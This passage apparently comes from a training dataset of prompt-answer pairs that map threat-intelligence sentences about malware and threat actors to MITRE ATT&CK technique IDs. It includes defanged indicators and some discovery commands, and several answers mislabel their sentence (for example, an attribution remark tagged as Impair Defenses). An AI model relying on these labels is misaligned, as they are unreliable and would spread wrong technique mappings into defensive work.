Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has used shell scripts for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After reestablishing access, the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command execution Command execution can create havoc for victim if the malware developer decides to execute commands in the victim’s device### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT queries the Registry for specific keys for potential privilege escalation and proxy information.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has the ability to exfiltrate data over the Microsoft Outlook C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It then downloads and decrypts a PNG file### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUPERNOVA is a Web shell.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise exfiltrates data using cookie values that are Base64-encoded.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,23 Take screenshot, temporarily store it as TPX499.dat, and upload it to the C2### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax has used decoy traffic to surround its malicious network traffic to avoid detection.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The NETWIRE binary has been executed via PowerShell script.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Disturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has used the Rijndael symmetric encryption algorithm to encrypt strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can inject its modules into various processes using reflective DLL loading.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A module in Prikormka collects information on available printers and disk drives.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rifdoor has been distributed in e-mails with malicious Excel or Word documents.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete stores zipped files with profile data from installed web browsers.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OnionDuke uses Twitter as a backup C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can obtain a list of smart card readers attached to the victim.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HALFBAKED can delete a specified file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses .### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Brave Prince variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WhiskeyBravo can be used to overwrite the first 4.9MB of physical drives.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RemoteCMD copies a file over to the remote system before execution.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects registered owner details by using the commands systeminfo and net config workstation.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner used an MSI installer to install the virtualization software.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer mimics a legitimate Russian program called USB Disk Security.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The configuration and strings are encrypted using 3DES and Base64 encoding### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use email rules to hide inbound emails in a compromised user's mailbox.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can run nltest /domain_trusts /all_trusts for domain trust discovery.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cannon can take a screenshot of the desktop.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer used Tor nodes for C2.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has used SSH to move laterally through victim environments.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Downdelph bypasses UAC to escalate privileges by using a custom “RedirectEXE” shim database.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has been known to reach a command and control server via one of nine proxy IP addresses.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer attempts to copy itself to remote machines on the network.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These PowerShell scripts are final stage payloads – they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities.  hUpdateCheckers.ps1 (POWRUNER) The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has created a scheduled task named “AdobeFlashSync” to establish persistence.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can open an active screen of the victim’s machine and take control of the mouse and keyboard.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT has the ability to gather a list of files and directories on the infected system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has named services to appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is unknown what these domains may have been used for but based on the similarity of domain spoofing and sharing an IP, they are likely part of the adversary infrastructure### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volatile Cedar can deploy additional tools.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar has the ability to use an alternative C2 server if the primary server fails.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon execution, this Trojan checks to see if it was configured with “BINDERON” to determine if it should extract an embedded payload from a resource named “B”, save it to %TEMP%\%BIND1%, and create a new process with the embedded payload### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has acquired mobile phone numbers of potential targets, possibly for mobile malware or additional phishing operations.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET uses a hidden folder named .xcassets and .git to embed itself in Xcode.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can collect data from network drives and stage it for exfiltration.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Cobalt Strike System Profiler can discover applications through the browser and identify the version of Java the target has.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can exploit vulnerabilities such as MS14-058.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network Downloader The Network Downloader functionality allows the actor to quickly upload user files from remote victim systems### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Native API functions may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XTunnel is capable of probing the network for open ports.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used malware to delete files after they are deployed on a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They should also take the following steps to harden both web applications and the servers hosting them to reduce the risk of network intrusion via this vector.Use and configure available firewalls to block attacks.Take steps to secure Windows systems, such as installing and configuring Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) and Microsoft AppLocker.Monitor and remove any unauthorized code present in any www directories.Disable, discontinue, or disallow the use of Internet Control Message Protocol (ICMP) and Simple Network Management Protocol (SNMP) as much as possible.Remove unnecessary HTTP verbs from web servers### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy encrypts its configuration files with AES-256 and also encrypts its strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba can enumerate processes running on a victim's machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis obfuscates its code and encrypts the API names.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cryptoistic can use TCP in communications with C2.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This allows the adversary to gain information without making any API requests.### Assistant: T1538: Cloud Service Dashboard" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 identifies the victim username.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint can iterate through running processes every six seconds collecting a list of processes to capture from later.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal has encoded binary data with Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa can perform OS credential dumping using Mimikatz.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has added persistence via the Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load which causes the malware to run each time any user logs in.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used a custom secure delete function to make deleted files unrecoverable.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variation on this behavior takes advantage of differences in functionality across cloud regions.### Assistant: T1535: Unused/Unsupported Cloud Regions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used Registry keys to detect and avoid executing in potential sandboxes.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon's first stage has been executed by a call to CreateProcess with the decryption password in an argument.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Helminth VBScript receives a batch script to execute a set of commands in a command prompt.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware has a function to determine whether the C2 server wishes to execute the newly dropped file in a hidden window.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API.### Assistant: T1538: Cloud Service Dashboard" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D has the ability to upload files from a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There does appear to be function names however, including PeekMessageA, which has been previously observed in other keylogging malware### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instructions within guide.txt explaining how to carry out DNS hijacking attack In one part of guide.txt, an example target appears to be provided, with a corresponding adversary IP (185.162.235[.]106) for the legitimate domain to be redirected to### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware has conducted C2 over HTTP and HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,From these reports, we know that the group uses an abundance of tools and tactics, ranging across zero-day exploits targeting common applications such as Java or Microsoft Office, heavy use of spear-phishing attacks, compromising legitimate websites to stage watering-hole attacks, and targeting over a variety of operating systems – Windows, OSX, Linux, even mobile iOS### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise performs timestomping of a CAB file it creates.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware uses cmd.exe to execute commands on victims.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information in an attempt to calculate the geographical location of a victim host.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind installs itself as a new service with automatic startup to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Resulting script on the compromised government websites Users were redirected to https://google-updata[.]tk:443/hook.js, a BEeF instance, and https://windows-updata[.]tk:443/scanv1.8/i/?1, an empty ScanBox instance that answered a small piece of JavaScript code### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI can collect the IP address from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VMware DLL Check The Trojan checks to see if the files vmGuestLib.dll or vmbusres.dll exist in the system directory### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some malware that has been used by Axiom also uses steganography to hide communication in PNG image files.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used a Batch file to automate frequently executed post compromise cleanup activities.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To disguise the source of malicious traffic, adversaries may chain together multiple proxies.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon modules are stored encrypted on disk.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can enumerate Registry values, keys, and data.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has gained initial access by exploiting CVE-2019-18935, a vulnerability within Telerik UI for ASP.NET AJAX.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BACKSPACE will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A possible explanation for this is that the document was copied to another system with an incorrectly set system time, then saved with the incorrect time### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the Trojan runs as an executable within the “DsvHelper” folder, the Trojan will create a shortcut (.lnk file) and save the shortcut to the ‘DsvHelper’ folder### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can capture microphone recordings.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,From an infrastructure point of view there is no overlap between the two sets of activity, the only overlap is the use of the unique tool “DNSMessenger” When these points are considered together in conjunction with the significant difference in targeting they make a strong case for classifying this activity as distinct from FIN7 activity### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FlawedAmmyy will attempt to detect anti-virus products during the initial infection.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can decrypt downloaded payloads.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JSS Loader has been executed through malicious attachments contained in spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,- There were two interesting sub-classes found inside Main Activity: Receiver and Sender### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang performs service discovery using net start commands.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar has been downloaded via Windows BITS functionality.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows allows programs to have direct access to logical volumes.### Assistant: T1006: Direct Volume Access" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to compromise on-premises versions of Microsoft Exchange Server, enabling access to email accounts and installation of additional malware.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Persistence is maintained through a Run registry key### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As such, Valid Accounts used by the other party for access to internal network systems may be compromised and used.### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Net is an example utility that can be used to remove network share connections with the net use \\system\share /delete command.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can retrieve information from the infected machine.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One example of these samples is given below: SHA256:6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb The file is a self-extracting RAR, which is a common delivery mechanism for PlugX particularly when the eventual payload will be sideloaded by a legitimate executable### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POSHSPY uses PowerShell to execute various commands, one to execute its payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa has used brute force attempts against a central management console, as well as some Active Directory accounts.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RunningRAT captures keystrokes and sends them back to the C2 server.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal uses rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 uses DNS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A process scope COR_PROFILER can also be created in-memory without modifying the Registry.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic gathers a list of all user accounts, privilege classes, and time of last logon.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain, msoffice-cdn[.]com which we identified in August 2017### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Valid Accounts to interact with remote machines by taking advantage of Distributed Component Object Model .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background without interrupting other networked applications.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There have also been similar examples of extensions being used for command & control.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader injects into the Internet Explorer process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can continue tagging documents to collect with follow up scans.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.### Assistant: T1610: Deploy Container" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UBoatRAT can list running processes on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,text= from= ai= ags= oe= aq= btnG= oprnd= ai= utm= channel= The page address in the domain of the command and control server is chosen randomly from the list### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The return traffic may occur in a variety of ways, depending on the Web service being utilized.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has signed Carbanak payloads with legally purchased code signing certificates.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT downloads and uploads files to and from the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dipsind uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware that can capture screenshots of the victim’s machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used external remote services such as virtual private networks to gain initial access.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI can collect the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ccache file may also be converted into a Windows format using tools such as Kekeo.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE , an adversary can successfully validate any file using that SIP .### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has gathered credentials using Mimikatz and ProcDump.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty contains junk code in its binary, likely to confuse malware analysts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 used WMI to deploy their tools on remote machines and to gather information about the Outlook process.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Safe mode starts up the Windows operating system with a limited set of drivers and services.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can capture keystrokes on a compromised host.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner has retrieved iPhone text messages from iTunes phone backup files.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An executable dropped onto victims by Putter Panda aims to inject the specified DLL into a process that would normally be accessing the network, including Outlook Express , Outlook , Internet Explorer , and Firefox .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about network trusts may include a variety of details, including second or third-party organizations/domains that have connected network access.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used process hollowing in iexplore.exe to load the RedLeaves implant.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Phishing for Information, establishing operational resources , and/or initial access .### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Activities may include the acquisition of malware, software , exploits, certificates, and information relating to vulnerabilities.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ipconfig ### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky lists all installed software for the infected machine.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda will delete their tools and files, and kill processes after their objectives are reached.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Poseidon Group tools attempt to spoof anti-virus processes as a means of self-defense.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,capture screenshot### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examining historical IP resolutions revealed a common IP between the active nameservers, 107.175.75[.]123### Assistant: 